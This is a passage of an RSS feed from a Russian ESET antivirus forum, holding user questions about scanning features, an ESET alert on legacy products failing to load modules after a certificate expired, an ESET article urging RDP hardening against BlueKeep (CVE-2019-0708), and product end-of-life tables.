			Раньше в Eset Nod 32 было видно, что в данный момент проверяет программа. Теперь этого нет. Где увидеть текущий проверяемый файл, те которые на &quot;лету&quot; при обращении к ним?<br />Спасибо. <br />
			<i>05.10.2020 00:33:53, Иван Иванов.</i>]]></description>
			<link>http://forum.esetnod32.ru/messages/forum9/topic16048/message110412/</link>
			<guid>http://forum.esetnod32.ru/messages/forum9/topic16048/message110412/</guid>
			<pubDate>Mon, 05 Oct 2020 00:33:53 +0300</pubDate>
			<category>Полезная информация</category>
		</item>
		<item>
			<title>Отличия сканирования с правами админа и простого</title>
			<description><![CDATA[<b><a href="http://forum.esetnod32.ru/messages/forum9/topic15963/message109421/">Отличия сканирования с правами админа и простого</a></b> в форуме <a href="http://forum.esetnod32.ru/forum9/">Полезная информация</a>. <br />
			Здравствуйте. Расскажите пожалуйста. Что дополнительно сканируется при выборе &quot;сканировать, как админ&quot;? Используется встроенный администратор (так называемый суперадмин) для этого или пользовательская учетка с админскими правами? Выполняется ли вход на админскую учетку, если ты сидишь под простым пользователем без прав админа, или просто запрашиваешь разрешение на сканирование от админа, не входя в учетку админа? &nbsp; <br />
			<i>27.07.2020 20:57:53, Подозрительный Человек.</i>]]></description>
			<link>http://forum.esetnod32.ru/messages/forum9/topic15963/message109421/</link>
			<guid>http://forum.esetnod32.ru/messages/forum9/topic15963/message109421/</guid>
			<pubDate>Mon, 27 Jul 2020 20:57:53 +0300</pubDate>
			<category>Полезная информация</category>
		</item>
		<item>
			<title>Функции Eset endpoint antivirus/security 5</title>
			<description><![CDATA[<b><a href="http://forum.esetnod32.ru/messages/forum9/topic15920/message109183/">Функции Eset endpoint antivirus/security 5</a></b> <i>функция антифишинга</i> в форуме <a href="http://forum.esetnod32.ru/forum9/">Полезная информация</a>. <br />
			Подскажите пожалуйста есть в ESET ENDPOINT ANTIVIRUS/SECURITY ВЕРСИИ 5 функция антифишинга? Спасибо заранее! <br />
			<i>07.06.2020 23:50:53, Erbol Akhtaylyakov.</i>]]></description>
			<link>http://forum.esetnod32.ru/messages/forum9/topic15920/message109183/</link>
			<guid>http://forum.esetnod32.ru/messages/forum9/topic15920/message109183/</guid>
			<pubDate>Sun, 07 Jun 2020 23:50:53 +0300</pubDate>
			<category>Полезная информация</category>
		</item>
		<item>
			<title>ESET: Проблема запуска устаревших продуктов</title>
			<description><![CDATA[<b><a href="http://forum.esetnod32.ru/messages/forum9/topic15708/message108202/">ESET: Проблема запуска устаревших продуктов</a></b> в форуме <a href="http://forum.esetnod32.ru/forum9/">Полезная информация</a>. <br />
			<B>Детали оповещения</B><br /><br /><B>Мы хотели бы сообщить вам, что мы обнаружили проблему в более старых версиях продуктов наших бизнес-продуктов Windows, в частности ESET Endpoint Antivirus / ESET Endpoint Security v5 (старше 5.0.2271), ESET Endpoint Antivirus / ESET Endpoint Security / ESET Защита файлов для Windows 6.5.2000+, ESET Mail Security для Microsoft Exchange Server 6.5, ESET Security для Kerio 6.5, ESET Mail Security для Domino 6.5 и ESET Security для Sharepoint Server 6.5.</B><br /><br />Эта проблема НЕ касается последних версий наших продуктов, включая последние версии ESET Endpoint Antivirus / ESET Endpoint Security - 6.6.2089 и ESET File Security для Windows 7.1.12018, и клиенты, использующие последние версии, никак не затрагиваются. Эта проблема относится к уязвимым версиям, перечисленным и описанным ниже.<br /><br />ESET обнаружила, что в нашем ядре есть проблема с проверкой отметки времени уже истекшего сертификата (срок действия которого истек 7 февраля 2020 г.). Этот метод дает сбой, и наши модули в более старых, устаревших версиях объявляются как ненадежные и поэтому не загружаются. Этот механизм гарантирует, что ненадежная библиотека не загружается.<br /><br />В результате уязвимые версии не загружают модули (брандмауэр, HIPS, обновление, защита устройства, защита через Интернет и электронную почту) и не работают, поэтому защита не работает.<br /><br /><B>Новейшие версии наших продуктов НЕ затрагиваются.</B><br /><br />Симптомы:<br />Для версий старше 5.0.2271.x симптомы:<br />- Не удалось загрузить модули для семейства v5<br />- Графический интерфейс главного окна на английском языке и логотип показывает ESET Smart Security 5 вместо Endpoint Security<br /><br />Для версий 6.5.x симптомы:<br />- Отчеты о продуктах антифишинга отключены<br />- Продукт сообщает, что он не активирован<br />- У расширенных настроек продукта отсутствуют функции<br /><br />Если ими управляет наш ESET Remote Administrator или ESET Security Management Center, они обратятся к соответствующей параметрической группе и сообщат о предупреждении как не активированном, а модуль антифишинга - как неработающий.<br /><br />В случаях, когда библиотеки загружены, SelfDefense защищает процесс EKRN и делает невозможным удаление.<br /><br /><br /><B>Решение<br />Важно!</B><br /><br />Если вы используете уязвимые версии и проблема не проявляется, не перезагружайте компьютер и немедленно выполните обновление.<br /><br />На данный момент не существует автоматического решения, и ESET работает над подготовкой такого решения для большинства версий, когда это возможно.<br /><br /><B>Мы рекомендуем обновить конечные точки v5 до последней версии v5.0.2271.x, которая, по возможности, не затронута. В противном случае мы рекомендуем удалить v5 и установить ESET Endpoint Antivirus / ESET Endpoint Security 7.2.<br /><br />Для семейства v6.5 мы настоятельно рекомендуем обновить до последней версии ESET Endpoint Antivirus / ESET Endpoint Security 7.2 или ESET File Security для Windows / ESET Mail Security для Microsoft Exchange Server / ESET Mail Security для Domino / ESET Security для Sharepoint Server 7.1 ,<br /></B><br />Для ESET Security для Kerio 6.5 мы работаем над этим и исправим его как можно скорее.<br /><br />Если вы используете Windows XP с EEA / EES 6.5.x, мы рекомендуем перейти на последнюю версию EEA / EES 5.0.2271.<br /><br />Если эта проблема уже возникла на ваших компьютерах, и вы не можете удалить и / или обновить продукты ESET, обратитесь к местному клиенту ESET, который предоставит вам решение и проведет вас через весь процесс.<br /><br /> <br /><B>Пострадавшие сборки:</B><br /><br />ESET Endpoint Antivirus и ESET Endpoint Security для Windows, версии от 5.0.2126.0 до 5.0.2260.x<br />Последняя доступная сборка ESET Endpoint Antivirus / ESET Endpoint Security 5.0.2271.0 не затрагивается.<br /><br /><br />ESET Endpoint Antivirus, ESET Endpoint Security и ESET File Security для Windows, версии 6.5.x<br />Последняя версия ESET Endpoint Antivirus / ESET Endpoint Security 6.6.2089.x и 7.2.2055.x не затронута, равно как и последняя версия 7.1.12018.x ESET File Security для Windows.<br /><br /><B>Если у вас есть какие-либо проблемы или вопросы - или вы не можете перейти на последние версии - не стесняйтесь обращаться в службу поддержки клиентов ESET в вашем регионе.</B><br /><br /><noindex><a href="https://support.eset.com/en/alert7396-legacy-products-startup-issue" target="_blank" rel="nofollow">https://support.eset.com/en/alert7396-legacy-products-startup-issue</a></noindex> <br />
			<i>10.02.2020 17:00:54, santy.</i>]]></description>
			<link>http://forum.esetnod32.ru/messages/forum9/topic15708/message108202/</link>
			<guid>http://forum.esetnod32.ru/messages/forum9/topic15708/message108202/</guid>
			<pubDate>Mon, 10 Feb 2020 17:00:54 +0300</pubDate>
			<category>Полезная информация</category>
		</item>
		<item>
			<title>Пришло время отключить доступ к RDP из интернета</title>
			<description><![CDATA[<b><a href="http://forum.esetnod32.ru/messages/forum9/topic15582/message107882/">Пришло время отключить доступ к RDP из интернета</a></b> в форуме <a href="http://forum.esetnod32.ru/forum9/">Полезная информация</a>. <br />
			Хотя уязвимость BlueKeep (CVE-2019-0708) до настоящего времени не вызывала широкомасштабного хаоса, и мы рассмотрим причины, по которым в этом посте она все еще находится на очень ранней стадии жизненного цикла эксплуатации. Факт остается фактом, что многие системы все еще не исправлены, и все еще можно найти полностью исправленную версию эксплойта. Из-за этих факторов ESET создала бесплатную утилиту для проверки уязвимости системы.<br /><noindex><a href="https://download.eset.com/com/eset/tools/diagnosis/bluekeep_checker/latest/esetbluekeepchecker.exe" target="_blank" rel="nofollow">https://download.eset.com/com/eset/tools/diagnosis/bluekeep_checker/latest/esetblu<WBR/>&shy;ekeepchecker.exe</a></noindex><br /><br />Существует множество серверов, работающих под управлением различных версий серверных операционных систем Microsoft Windows, которые напрямую подключены к Интернету, что практически не обеспечивает безопасности доступа к ним.<br /><br /><B>Что такое RDP?</B><br /><br />RDP, сокращение от «Протокол удаленного рабочего стола», позволяет одному компьютеру подключаться к другому компьютеру по сети, чтобы использовать его удаленно. В домене компьютеры с операционной системой Windows Client, такой как Windows XP или Windows 10, поставляются с предустановленным клиентским программным обеспечением RDP как часть операционной системы, которая позволяет им подключаться к другим компьютерам в сети, включая сервер организации ( с).<br /><br />Сегодня, обычно к пользователям RDP относятся системные администраторы, выполняющие удаленное администрирование серверов, а также удаленные работники, которые могут подключаться к виртуализированным настольным компьютерам внутри домена своей организации.<br /><br />За последние несколько лет в ESET наблюдают рост числа случаев, когда злоумышленники подключались к Интернету с помощью RDP удаленно к Windows Server через Интернет и входили в систему как администратор компьютера. После того, как злоумышленники войдут на сервер как администратор. Далее, они выполняют различные действия:<br /><br /> &nbsp; <br />====quote====<br /> очистка лог-файлов, содержащих доказательства их присутствия в системе;<br /> &nbsp; &nbsp;отключение запланированных резервных копий и теневых копий;<br /> &nbsp; &nbsp;отключение защитного программного обеспечения или настройка исключений в нем (что разрешено администраторам);<br /> &nbsp; &nbsp;загрузка и установка различных программ на сервер;<br /> &nbsp; &nbsp;стирание или перезапись старых резервных копий, если они доступны;<br /> &nbsp; &nbsp;эксфильтрация данных с сервера;<br /> &nbsp; &nbsp;установка программ добычи монет для генерации криптовалюты, таких как Monero;<br /> &nbsp; &nbsp;установка Ransomware с целью вымогательства денег у организации, которые часто выплачиваются с использованием криптовалюты, такой как биткойны.<br />=============<br /><br /><br />Уязвимость BlueKeep позволяет злоумышленникам запускать произвольный программный код на компьютерах своих жертв. Поскольку они могут использовать автоматизированные инструменты для атак, эта атака может распространяться автоматически по сетям без какого-либо вмешательства пользователей, как Win32 / Diskcoder.C ( ака NotPetya) и Conficker в прошлом.<br /><br />В начале сентября Rapid7, разработчик инструмента пентестинга Metasploit, объявил о выпуске эксплойта BlueKeep. Несмотря на то, что в течение следующих нескольких месяцев не было зарегистрировано заметного увеличения активности BlueKeep, в последнее время ситуация изменилась. В начале ноября, как отмечают ZDNet и WIRED, стали доступны массовые сообщения об эксплуатации BlueKeep. По сообщениям, атаки были менее чем успешными: около 91% уязвимых компьютеров вылетали с ошибкой остановки (так называемая проверка ошибок или синий экран смерти), когда злоумышленник пытается использовать уязвимость BlueKeep. Однако на оставшихся 9% уязвимых компьютеров эти злоумышленники успешно установили программное обеспечение для криптомайнинга Monero.<br /><br /><B>Защита от злоумышленников, атакующих RDP</B><br /><br />Итак, учитывая все это, что вы можете сделать? Ну, во-первых, очевидно, чтобы прекратить подключение напрямую к вашим серверам через Интернет с помощью RDP. Поддержка Windows Server 2008 и Windows 7 заканчивается в январе 2020 года, наличие компьютеров под управлением этих компьютеров и их прямой доступ через RDP через Интернет представляет собой риск для вашего бизнеса, который вы уже должны планировать снизить.<br /><br />Это не означает, что вам необходимо немедленно прекратить использование RDP, но вам необходимо предпринять дополнительные шаги, чтобы обезопасить его как можно скорее и как можно быстрее. С этой целью мы создали таблицу с десятью основными шагами, которые вы можете предпринять, чтобы начать защищать свои компьютеры от атак на основе RDP.<br /><br /><br />====quote====<br /> &nbsp; &nbsp;1. Запретить внешние подключения к локальным компьютерам через порт 3389 (TCP / UDP) на межсетевом экране периметра. * Блокирует доступ к RDP из Интернета.<br /> &nbsp; &nbsp;(* По умолчанию RDP работает на порте 3389. Если вы изменили этот порт на другое значение, то этот порт должен быть заблокирован.)<br /><br /> &nbsp; &nbsp;2. Протестируйте и разверните исправления для уязвимости CVE-2019-0708 (BlueKeep) и включите аутентификацию на уровне сети (NLA) как можно быстрее. Установка исправления Microsoft и следование их предписывающим рекомендациям помогает обеспечить защиту устройств от уязвимости BlueKeep.<br /><br /> &nbsp; &nbsp;3. Для всех учетных записей, в которые можно войти через RDP, требуются сложные пароли (обязательна длинная парольная фраза, содержащая более 15 символов). Защищает от взлома паролей и взлома учетных данных.<br /><br /> &nbsp; &nbsp;4. Установите двухфакторную аутентификацию (2FA) и, как минимум, требуйте ее для всех учетных записей, в которые можно войти через RDP. Требуется второй уровень аутентификации, доступный сотрудникам только через мобильный телефон, токен или другой механизм для входа в компьютеры.<br /><br /> &nbsp; &nbsp;5. Установите шлюз виртуальной частной сети (VPN), чтобы обеспечить безопасность во всех RDP-подключениях вне локальной сети. Предотвращает RDP-соединения между интернетом и вашей локальной сетью.<br /><br /> &nbsp; &nbsp;6. Защитите программное обеспечение для защиты конечных точек паролем, используя надежный пароль, не связанный с учетными записями администраторов и служб.<br /><br /> &nbsp; &nbsp;7. Включите блокировку эксплойтов в программном обеспечении безопасности конечных точек. Убедитесь, что эта функция включена.<br /><br /> &nbsp; &nbsp;8. Изолируйте любой небезопасный компьютер, к которому требуется доступ из Интернета, используя RDP.<br /><br /> &nbsp; &nbsp;9. Заменить небезопасные компьютеры. Если компьютер не может быть исправлен с помощью уязвимости BlueKeep, запланируйте его своевременную замену.<br /><br /> &nbsp; &nbsp;10. Рассмотрите возможность блокировки geoIP на шлюзе VPN. Если сотрудники и поставщики находятся в одной и той же стране или в небольшом списке стран, рассмотрите возможность блокировки доступа из других стран, чтобы предотвратить соединения со стороны иностранных злоумышленников.<br />=============<br /><br /><br /><B>Использование средства проверки уязвимости ESET BlueKeep (CVE-2019-0708)</B><br /><br />ESET выпустила бесплатный инструмент BlueKeep (CVE-2019-0708), чтобы проверить, уязвим ли компьютер под управлением Windows. На момент публикации инструмент можно загрузить с:<br /><br /> &nbsp; &nbsp;Program ESET BlueKeep (CVE-2019-0708) vulnerability checker<br /> &nbsp; &nbsp;Version 1.0.0.1<br /> &nbsp; &nbsp;Location <noindex><a href="https://download.eset.com/com/eset/tools/diagnosis/bluekeep_checker/latest/esetbluekeepchecker.exe" target="_blank" rel="nofollow">https://download.eset.com/com/eset/tools/diagnosis/bluekeep_checker/latest/esetblu<WBR/>&shy;ekeepchecker.exe</a></noindex><br /> &nbsp; &nbsp;SHA-1 hash C0E66EA2659D2EA172950572FDB5DE881D3882D8<br /><br /><br />При запуске программа сообщит, уязвима ли система для эксплуатации BlueKeep или нет. В случае уязвимости системы инструмент переместит пользователя на веб-страницу, чтобы загрузить соответствующий патч на веб-сайте Microsoft.<br /><br /><img src="https://chklst.ru/uploads/editor/zd/zh4m7q1881yd.jpg" alt="Пользователь добавил изображение" border="0" /><br /><br />подробнее здесь:<br /><br /><noindex><a href="https://www.welivesecurity.com/2019/12/17/bluekeep-time-disconnect-rdp-internet/" target="_blank" rel="nofollow">https://www.welivesecurity.com/2019/12/17/bluekeep-time-disconnect-rdp-internet/</a></noindex> <br />
			<i>27.12.2019 08:10:10, santy.</i>]]></description>
			<link>http://forum.esetnod32.ru/messages/forum9/topic15582/message107882/</link>
			<guid>http://forum.esetnod32.ru/messages/forum9/topic15582/message107882/</guid>
			<pubDate>Fri, 27 Dec 2019 08:10:10 +0300</pubDate>
			<category>Полезная информация</category>
		</item>
		<item>
			<title>ESET End of Life политика для коммерческих и домашних продуктов</title>
			<description><![CDATA[<b><a href="http://forum.esetnod32.ru/messages/forum9/topic15416/message107086/">ESET End of Life политика для коммерческих и домашних продуктов</a></b> в форуме <a href="http://forum.esetnod32.ru/forum9/">Полезная информация</a>. <br />
			<B>для коммерческих продуктов:</B><br /><br />ESET Endpoint Antivirus<br />Version 	Release Date 	Latest build 	Updated 	Status 	Next Status 	Expected EOL<br />7.0 	16-Aug-18 	7.1.2045.5 	11-Apr-19 	Full Support 	Limited Support 	TBA<br />6.6 	24-Aug-17 	6.6.2089.2 	13-Nov-18 	Full Support 	Limited Support 	TBA<br />6.5 	14-Mar-17 	6.5.2123.5 	28-Nov-17 	Full Support 	Limited Support 	TBA<br /><br />ESET Endpoint Security<br />Version 	Release Date 	Latest build 	Updated 	Status 	Next Status 	Expected EOL<br />7.0 	16-Aug-18 	7.1.2045.5 	11-Apr-19 	Full Support 	Limited Support 	TBA<br />6.6 	25-Feb-15 	6.6.2089.2 	13-Nov-18 	Full Support 	Limited Support 	TBA<br />6.5 	14-Mar-17 	6.5.2123.5 	28-Nov-17 	Full Support 	Limited Support 	TBA<br /><br />ESET File Security for Microsoft Windows Server<br />Version 	Release Date 	Latest build 	Updated 	Status 	Next Status 	Expected EOL<br />7.0 	16-Aug-18 	7.0.12018.0 	29-Jan-19 	Full Support 	Limited Support 	TBA<br />6.5 	28-Feb-17 	6.5.12018.0 	28-Aug-18 	Full Support 	Limited Support 	TBA<br />6.4 	7-Sep-16 	6.4.12004.0 	30-Nov-16 	Full Support 	Limited Support 	TBA<br /><br /><noindex><a href="https://support.eset.com/kb3592/" target="_blank" rel="nofollow">https://support.eset.com/kb3592/</a></noindex><br /><br /><B>для домашних продуктов:</B><br /><br />ESET Smart Security Premium<br />Version 	Release Date 	Latest Build 	Updated 	Status 	Next Status 	Expected EOL<br />12 	23-Oct-18 	12.2.23.0 	18-Jul-19 	Full Support 	Limited Support 	Dec 2022<br />11 	24-Oct-17 	11.2.63.0 	11-Sep-18 	Limited Support 	Basic Support 	Dec 2021<br />10 	25-Oct-16 	10.1.245.0 	17-May-18 	Basic Support 	End of Life 	Dec 2020<br /><br />ESET NOD32 Antivirus<br />Version 	Release Date 	Latest Build 	Updated 	Status 	Next Status 	Expected EOL<br />12 	23-Oct-18 	12.2.23.0 	18-Jul-19 	Full Support 	Limited Support 	Dec 2022<br />11 	24-Oct-17 	11.2.63.0 	11-Sep-18 	Limited Support 	Basic Support 	Dec 2021<br />10 	25-Oct-16 	10.1.245.0 	17-May-18 	Basic Support 	End of Life 	Dec 2020<br /><br /><noindex><a href="https://support.eset.com/kb3678/?segment=home" target="_blank" rel="nofollow">https://support.eset.com/kb3678/?segment=home</a></noindex> <br />
			<i>13.08.2019 16:45:54, santy.</i>]]></description>
			<link>http://forum.esetnod32.ru/messages/forum9/topic15416/message107086/</link>
			<guid>http://forum.esetnod32.ru/messages/forum9/topic15416/message107086/</guid>
			<pubDate>Tue, 13 Aug 2019 16:45:54 +0300</pubDate>
			<category>Полезная информация</category>
		</item>
	</channel>
</rss>
